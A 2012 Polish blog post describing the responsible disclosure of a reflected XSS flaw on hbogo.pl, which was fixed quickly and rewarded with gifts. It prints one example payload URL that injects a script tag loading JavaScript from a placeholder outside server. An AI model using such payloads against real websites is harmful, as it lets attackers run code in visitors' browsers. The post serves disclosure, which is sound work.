poniedziałek, 17 grudnia 2012

Reflected XSS w HBOGO

Na stronie http://hbogo.pl jakiś czas temu znalazłem reflected xss'a. Zaraz po jego zgłoszeniu nastąpił błyskawiczny kontakt ze strony pracownika firmy, zgłoszenie oraz poprawka. W ramach podziękowania otrzymałem gadżety - voucher, dwa energetyki, mnóstwo krówek i chyba cały sezon Imperium na DVD. Taki kontakt mi się podoba! No i będzie co oglądać ;-)

Przykładowy payload...

http://www.hbogo.pl/vip/template.aspx?id=test%3Cscript%20src=%22http://some-server/SOME-SCRIPT.JS%22%3E%3C/script%3E

...efekt wywołania URL:




No i gadżety ;-)



Niebawem kolejne 'znaleziska'. Pozdrawiam!


1 komentarz:

  1. chyba jeden z nielicznych przykładów kulturalnego podejścia do tematu... w wiekszości przypadków cieżko liczyć nawet na "dziękuję"

    OdpowiedzUsuń